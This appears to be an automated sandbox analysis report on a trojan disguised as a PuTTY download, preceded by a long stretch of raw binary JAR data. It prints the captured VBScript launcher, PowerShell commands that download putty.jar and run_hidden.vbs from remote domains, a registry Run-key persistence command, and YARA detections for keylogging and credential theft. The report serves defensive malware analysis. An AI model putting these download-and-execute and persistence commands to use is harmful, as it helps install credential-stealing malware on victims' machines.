Bº[ÃN¾_¡?kæUÒ61w b»9bs7ãyv+Ò=&?÷ÚüÜ9öÅ×^éø4\ñÐ××85AVËY\|ª5µz2¿°¹O#ÉüÖ«H'0Å`cùl¼æMÕâù,Ý& J7¯{eßx»pÛ /:2¹ßÉøÊmÀf·òø6-æ´ô°æ²ØzTè1¾` èñKê<NïëgyËø¥ã~xO8Ô<iõÐSøÒï¨õi>Ña´>H&°Ô¾þJ!©P*´/µÖÄä&ÄGõá®\|Kò-È'îS£È£
Data received	@ìOL¹@´KoìÙnîÓÁ6£ò]hsMl Z?LbK, /ÖØnvq1·t.c×ùPK¬q9q.®fPKgtWFIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIllIlIIIIlIlIlII.classµXwxTÇv?ËJÚXÁèÂD·AEÔ.êÚ¢jÀlÃ"-°°¬´¢¸`bºm0Å6[Àr# D^ÊKòÈKê§Ýö^Êùï}_¾÷üfî]!$wïßÌ3§Í3üè?ï´ÑúgÍ DHi$(à¥ÿE"ÅõÖ8)¶»G+8½r¹hÚÓIÑ¶¼=ävÑôÒ§T$±[jtªº+Ü°\Ô3qxqQº9¸=X F7ÅªÃÑ5ï©WµvnBNæö`¤6ä¢îU¡ê`ÂËvÕÄB[]Ä¶HZ¼n¹¨ÇÎôé°õm×ÚpQÖÐúò dùìÉ6¼µ5¡êhp«Z×é´W Üå¿HtsQ^Àa·¦vÍuQny$ÆVªkÂQàH°Õ¾)¬jjàÑ´ÚGËËS^YUïRóéx0WYUÜÍX$,{ål VWìVsÛe§SÊfuQï5%ÂÎ\÷¨/6ª=ôUÚ,pyAg3}4çÐ³T¥¾9ê¡"Øì`qFAá¤Q94F#½ÖxhëÑpeq9¬¨ Å Asl\ã¡qÙ 9íXá¢¾¥OLp¡ÐMã lYÓÂÑplÂîoR¸ÒGiÒÉ}§!ö4wÊ¥nÙÔ×²â{Ä]+~Äï±RÔ[5¬Ô}+õ¹j³÷uû¾?f%ãV<îð$ñn°mVêjuxÔÓl%f¹hµºìð«g¯~Çd«¼¢`®_H=ù´â×ø +qØsHÔòKüäML8rHpGukaTSZ½&ý\ÒÏ-=¤uNÝµ¬dõZþ\%ßÿ@5RûúØJ~ÒÁÞ¶íÿþyKc·µüùZ~cG¬Ä}õ¤®Y©«Vâ¢º{ï»®9³ZþB%?aû0½DJOtríf¤Gê°Ô:$$ñÒsüßï¤Dç³âÓÏ-Éºqß2ÚíÁÕòKuþ´9Âü]tÒ&ÎÆÄ~ ø£$â:ÄÇÓýñÇå/Öòëµ[À¶ÿq'ÛyrF¿¯¤e~#Öåü¥Z¾-êø~¾m%ë;ôïWÞKvtf»üå:n§êäQ£VÍÿørpÌWÑîºN´óÛüqäËt~RSûZo²m©Ü§w½ìµ_?q½ÀÐìäFâDù+å¿9ÍVü¨òUêúÐßÓ+6kÅNè ÖÏôcÇt¿hI+¿¯üùø%Ò.JÔét]Ã;Êdz9SÆ&mù'þj¿¼¯\|ÕAy-µoã4Ç·ô«³âgÕ6W»¸ÎJWnO>ë¤~TÐÑØ«3Ð6¶I}aR¼ôÿG'Ð¼å¡ªÎa½âÞ>ù³ÝÃeèýôÊ õîumÜëwoù{ä×òp~;aìäqÄ ^ÂyçR§Cuô=yð\|¦ÍêèÛâîuüßÿÍG=©"êc¼ñ{ÚLvQ¶ª&F«rÂKÕ
Data received	Î+þCñù'}'Ä%??ùó{xòüL<ïó÷OF®øéÕ»æ{TïÆ77Í\ûÖe¿qZ¥\|«çü9y@ß±9ý+=/÷ëyzvù°S_ÆÏ¼Ðü¦¬Ho\qä[d]¾ÏOêéf}K½~ìDµ ½·ïo×ôi_üZï®ÏLvÀ³3Ó×ÿåWÎí=þ ÷¨§Éð¶ú<«ýþÎ ;èíôS/L©ëßþ`ùP×Ù.?{¨ñµÙäînÚÙÄ@_vHÍFô=CH'L¤ÿ¤ ûe·'p¦@Òâ)2SiÂA:ÛÄN"#Õt3âíp~úÜ¡ßAZª¼Xnd³0¡ ¡ð)Ì1æòF¶1ÏÈ}rÅH5 C±Ø\,Vâç ¯DX%&¥åDù@Â©ÌgP^àLxUVVn}i¯´é5¬jÓ5K$`2;NOæÂ¶!Â)lî Âw¦²ÙØD(7 ;¦±5¸Pß)¸ ã»³áT6wÊwfGÃÍÞ,X"NcË±à4Þ"X¦³½¸`:ß#X2r6÷ä\|¯`Ì`nÜG0ï,§³ÜOp:ß/XÎ`sðÁü`ièdº :¹[03Y¶É[¬ Ûfò6AYl¶ÌâíMÃYl1zÎâÁÒq6«ÆgóqÃÖaÁ9¼CsY="8äo6+F/ÁlîlÎc[ñ0Áyü°`NÌaóðÁ~D°Ë ÐG0ûËÄùl%8,°ô\Àý¸JÐIp!ïÿ<Ö]óx ÐóÙ.<F0l.P!º ðnÁ²±ÀÁBäÂ"¶ñ `9XdÃBE¼G°\\L8Np1?.Ø\|,¦d XÌO¶°n<Ip ?)ØB,¡èO,á§ËÃ¥,O\ÊO²%ØK°÷ µ:C°¬Ë©Äg ó³-Bd¥øAäï Vl##XÁÏ raëÅ>Ëx /§T÷\Îû©¤Ü¬ä`kÆó«øyÁb51H° 2RÃá5ü`e¸íÇWðãJÄ!+ù`«Øj¼Dp¿$X®¦sàj~Y°eXKa\!XË¯:Êuì¾O°¿/X%®¡êÁ5üª }õT¢Öó©µþ5kù5A^ÇVà×ñ ×ÆG×óUËeÁaB.>,ØÜ@ÏæuøuAþmd;ðcùÇÕbæø ¡£½`¸'¡µÛKqÓ2whæN~ê´ðOKñ¾2ùæaÜBJ\|Pª[¶Q¼KønÞ&ÆÛ¥xoå·pß6Û¥êvÁí ÐþÓ×·_@EeâC¨«¼éL,pÞ\| k_«wñúÙS^ëÿ6¨Ñ4Ír ÿií_êÅ÷£ð¼o<8õè#et¬v%ÔùdÇË5\ÆGP5@-Âblä2Ã&c³B±±åMÏ¢!¯^ö Tü¶=mºÑØH"ÁØ!ÅØ)ÕØ-ÍhÂnìYýJÚ·v£MÉDÃ£dÑ¡d²áUÒaQ2Å8ªdªÑÙh:%aWÔ©äFãÑ=V B6Â·0FjNëX+<n.P¢@6»ÂÇpÊ8pÌHo¼1ÎËÛ{ãòÖgôËüPK5.Z PKgtWCIlI
Data received	Æ%uÂÙÂ®`$ghåRfuG0ÃEeâØñTK\pq"7àPn4Àa\À$ÆìpÎ0[0÷ªòm¯LT\ôÉn¯MX½ª,° _9äb2)b2)b2q040H~2iòÉDÇD2$ )\ËD²ÄÌDÌD2ÄÊD"2D3,f")a"±3\|"!L"×1öHDr½` ¯ê%ßzäFÞû-g¦ß·³JýPKô"tèO4PKgtW@IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIIllIIlllI.classÅWy@E÷×îAÇW'51wÔÑQQ1Áíªiê©^½²¸&¹¤Y©é]LÜWh±lß3m3o{V_}í}&¿gæ½Å¾úýÜ{fyg9çÌ9çûÂ¥£äA.Ã5ÊårÄ» ô¿ËïPRc+ÞvXst«:lÄ0åçw9sfÆ>+3£ÐF¨A¢¬åjæÄpPlHbÖªá0HÓ)£jXÆægçÌìàp·3Hhç4GÉçfçÆ;ÆYWc#Ô>ll1m0mÙèHJÂÂIÂh»©[èìëÈº¸AûD4aÿHÕfN~²S¼=¥me°þÙ9Ù)¡»¤G¤U"é(¶ÂASÇÏtÖªÇ4å,È²«Â;ÿ· G{ÅÑ&dU¶¤cÎ¹J¾Jt§C:¬LoØÅIg=]zF÷úØ¤Q_7Tb»{©/Aö(ºHÓÎl;e]ÆåfÏÉ¬å^D@ÝñkÚÑqG§tU"AötÜÑÉtØÅ1tâ³¿Ó¹·¤µ0½+`1»\{Iì$\ù1Í Òï^ú·>¾%~ÛïÛî÷ ~Ð·Æ\6ÙNü/fµd{ª²¾Ï6¿·6Ô{yhæaõ3{ÁyüOØ.ûû}[üîJõ ù½ëíÄQ³Çí÷n®YëÙìðûîò»ù½Çê{)6¬òíÖÙÉÈz½îB¸ïðû°öa%¡õ=è÷ÔÕå=¼ìäÚúkÚr5Ù[ê÷mòûÖû=Ío9sß·Y úVh®ö»½ÊßA¿§ÂïÞi'cêgÞ#~ÏqÕ¯1\|ßw¤º«?åÝwêñÇý>0ïKµÔ{`é#~uÃ§¬Úråðµ~Ïr5ÙWi'ãÿg<ßî÷ÒçUæ÷müÓðð¬ÑåÚËìdÂ_dòÆ:¤OhÊº¶C;v¹>kqîÁ;ø7AµÒïÙ\7)ô.¾~ï>¿÷¨vÂà#¸ñ¸Lúkf¥çÒ ?+ü»uÐ³Ò³JçÔµûHÀ->Äó¿`Æx[yCgx¼·×IOBËõÓíÁì~Pë\|cY@Ê×ÍGØXªVi~:ñX[×ñk?OUÌÞ½ÊR2Ô[ÙòvW {WàøÜ»ÕP¶/Ñæ,ó»é}á´CvâÔ:O§ìòºTC[+÷¡\|À¢-A§m×æy>vôsiÐZñ>¢JA5Úl«km´<ØY¦ÂÏÚj#èIc]sNN:ý<ÞÅ®ü¼éùYNgÆâ¹7ÛI¶Aü/·ºþºld6Õ¼ÀÅB ×¼OdÉ .\|cf»âÇ9sfäÎ±¹¡Ë=~¢ÐsÞ !GXïß¢OæÄ¹ ÐS¨ßî`Z@ª'Å´ãÝ¯ Þôv2+?w¾sº+ÓFnÅj£ªµvÐK¿æïx±\|;>¶8±m³Ê_LûìYþ3%M¶(¥Ä"J_iNJé4}ßØ0õ{Æ½paèA;·ûl!ý1\|7%të:Ñ¯E!Í)_[F¦~£¡§ó/ Ã~¹´Ä ±5 C·ÌN× ÌZ÷Md3îíªäÒôz£3ëfÐNn !xÐíÒÐó´¿AÒiÖ9ãJD$&$$&$%õIL´Ò¤Ö933óm¤×<g~A&F"É#ê8&ÒVãl;pjú-gö<{Ó:ÚíúwéÜúEÒø÷7>CÞÎ8DN8EïéJç9¹RuJ,£}S~§®ô4qÏâÉtÄ¬%¿ÐËW¢T-4·ùÑ¡tBFÑRêHþýó< ë½D%âH¡gW.è@ã;ôK;ì»D¨ó©9£èü# %tÈÔ¾÷±ZM47ÝCÇ\|_Úÿí"ÍøæôfuµÂYÇ,Â²yç)©.õÝVí¹V_Ån}S"ÉÛä´rÖ;<3³0uaafÓ.SR#ÉYònI%ï¤ÁTùÀ m5Cî¹YÊß B;óg¤Y¸ÀFÎáÎ:A(p3õ_±õyâ' ÒüùL+e>Uª\|ëÓrs °iaºÓU ]Órg "³¯uæI$¤-n!¸Ü7 áêâKþÙqD?24Ä/ñ ;fÛñ[`«ÙÈl¼4iYRR"l¦ÉmhXìVÛÈÏfSF²¸ÍfÖ@¸á¡n#Úäz $Å¼Bw¸ÍlNÙr·åa ZuKÌ4ÛH¨QyDM'WVr³±Ö³ÖÅÜ¶`ÉNõãD(7Þ×¿mÌéð¾%hÛm4y0cuo¢Ù60rN±íÊIÇJ³SPÎZ.5ÄYtÕ(³µ¾j¸Ù]÷JWIâ5IB I¢EÒ£$)@BÍÞf I_M\CÒÏ"é¯ILs@ÝÍS4¤)æ@Ýi½§5ã? ½¯à"ÂªÈb7ð«Oÿ#U¤ÙHT6¾øa5ßøV© P3=¥kxiT¢Ö5©wi\ë¯!¬Ð!¯#tlhËY$õ¼¦æÐñhBÌáª 5G¨&Ì¥9Z5vó:Õ°0snm¦ÔÝL×m¸y½n#ÌÉºmhÞ ÛHó&ÝFÓtÛÈ®ÛÆæÝ2óæñæL3Ëuä!ÃüIÍHA9Üb.âa%K&ûþ«Ô&)_ÚñÙk#aÞmÁÌ0ZæÃÍ%æíÁÌ3K@#Âá!wX°Xg46ê22Ä\¦û<Ì¼,s9$´ÈÃ@©ê+Ð¨ã_©'VÍ]gÌUA»5Ãê5ÃZÍP;Âj²),M1Æ^øè;´W§OÔDeSYØ0Â¼G÷&ë##Í AîÕl¬Qá>KûF<0b3ôØRi>¨!bx«îè.!{ðáq*"ûV¸khE_\íÆq: {UáølVZc-«´¡¨t1·î7ªk9ñ^`úÌíæÃdg»ôádwuyL G¹Ç\|¬¦<îµÊ_sûê ØNbÍýÖ@÷@yliÇ2²Ò<, ë¢p¨¦([Eáp (©[LªÌqóXá¸f8QÃPa1TÖÔ¦'«
Data received	lIlIlIIllI/IllIlIlIllIlIlIl.classPKgtWØ ÞÌU!CiÛIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIllIlllllllII.classPKgtW¸¡U'I¦èIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIllIlIIlIlIIIlllIll.classPKgtWHlwÀ!@¾ýIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llllllllIIll.classPKgtW@¥ùp¢F¿ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IllIIllIIllIlllIIl.classPKgtWj³0wAÈ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIIlllllIIIll.classPKgtWn%N HV" IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIIlIIllllIIlllII.classPKgtW)S~!nEI' IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlllIIllIlIIllIIIIllI.classPKgtWËÂÈC: CI IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIllllIIlIlllI.classPKgtWvÙI¦CÃM IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIIlllIIlllIIII.classPKgtWR¨ãH6S IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIIlIIlIIIIIlIIlIIII.classPKgtWéðZNV<BT IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIllIllIIlIll.classPKgtWKeÒDª-CMo IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIlIlIIlIIIlll.classPKgtWâ wxH IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIIIllIlllllIIIlIIIl.classPKgtWT£;&±ND IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIlIIlllllIllIIl.classPKgtW¸$iÖ áE´³ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIIlllIIlIlIIlIl.classPKgtWY*õðý¾ chat.pngPKgtWÄÐ=Ke(Á META-INF/MANIFEST.MFPKgtW;hÞµÁ checksumPKgtW_qf.a.wÃ rbBUgJMftidmzDqGDBpgxByDtjVtQVWSQxJWgieCJh/wyNfohYLyyNmoUfPLtJzxlWyslzaPQxTrNeDgvdqkXdquPKSBlxkcCiPOfXBRdypLVIqk/OMDXXPFIXqawBBLxGrzUCBroJHPTGsEIJgqXySpgYLvhqdmxR/fMxBbHYYnjSOrynOjMcUmhtxwXohIdpWnsHMWefLSNtenyNySX/OgLnwkWABCtPVCSGdFBzEZaNKXbYo/fHblRyjpDDpNxppQkqpdhsIEiFLXBcr/iKFCkpbiPMyeYYeooRIHsuxUGoYbSOGejFUfCeWanppPsusZsEeOeLKiOtbzqeOlxwtc/XXVjCtGhZraIIjVHvAnnASiGVCYxsTGYvabWrURyMWbRfAEyWhWojgaKOobkBbbfTRQFhJcrsK/QDHpALiUpydzolqFQLCdhduDPRhyhpwGVvmWBsDCqF/TAVhoagwVhsOpkbdZLqaSSLfWXw/VaFmdCfOluSZnXWTBCAWHRJrsbajDswgTfqplDJnnyjn.classPK-=(ô
Data received	HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 01:12:29 GMT Server: nginx/1.21.6 Content-Type: text/vbscript Content-Length: 187 Last-Modified: Mon, 11 Dec 2023 05:44:49 GMT X-Server-Cache: true X-Proxy-Cache: EXPIRED Accept-Ranges: bytes Set WshShell = CreateObject("WScript.Shell") WshShell.Run "cmd /c java -jar """ & WshShell.ExpandEnvironmentStrings("%TEMP%\PuttyDownload\putty.jar"""), 0, False Set WshShell = Nothing

Poweshell is sending data to a remote host (2 events)

Data sent	GET /s/putty.jar HTTP/1.1 Host: eusketxe.com Connection: Keep-Alive
Data sent	GET /fs/fs/run_hidden.vbs HTTP/1.1 Host: brahmacouncil.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 14, 2023, 10:12 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 14, 2023, 10:12 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f
cmdline	cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f"

Communicates with host for which no DNS query was performed (1 event)

host

154.127.53.176

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Home

reg_value

C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

cscript.exe

martian_process

cmd /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Dec. 14, 2023, 10:12 a.m.	buffer: GET /s/putty.jar HTTP/1.1 Host: eusketxe.com Connection: Keep-Alive socket: 1424 sent: 73	1	73	0
send Dec. 14, 2023, 10:12 a.m.	buffer: GET /fs/fs/run_hidden.vbs HTTP/1.1 Host: brahmacouncil.com Connection: Keep-Alive socket: 1424 sent: 87	1	87	0

Powershell script adds registry entries (1 event)

cmd

cmd /c java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar""c:\windows\system32\cmd.exe" /c java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar"cscript //nologo ""c:\users\test22\appdata\local\temp\puttydownload\run_hidden.vbs""reg add hkey_current_user\software\microsoft\windows\currentversion\run /v home /d "c:\program files (x86)\java\jre1.8.0_131\bin\javaw.exe -jar c:\users\test22\appdata\roaming\microsoft\.tmp\1702534343114.tmp" /fpowershell -command "(new-object system.net.webclient).downloadfile('http://eusketxe.com/s/putty.jar', 'c:\users\test22\appdata\local\temp\puttydownload\putty.jar')"cmd.exe /c "reg add hkey_current_user\software\microsoft\windows\currentversion\run /v home /d "c:\program files (x86)\java\jre1.8.0_131\bin\javaw.exe -jar c:\users\test22\appdata\roaming\microsoft\.tmp\1702534343114.tmp" /f"powershell -command "(new-object system.net.webclient).downloadfile('http://brahmacouncil.com/fs/fs/run_hidden.vbs', 'c:\users\test22\appdata\local\temp\puttydownload\run_hidden.vbs')"java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar"

One or more non-whitelisted processes were created (2 events)

parent_process	cscript.exe				martian_process	cmd /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
parent_process	cscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"

Putty Files, Registry Keys and/or Mutexes Detected

Creates a suspicious Powershell process (2 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

POA35BT56TT.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All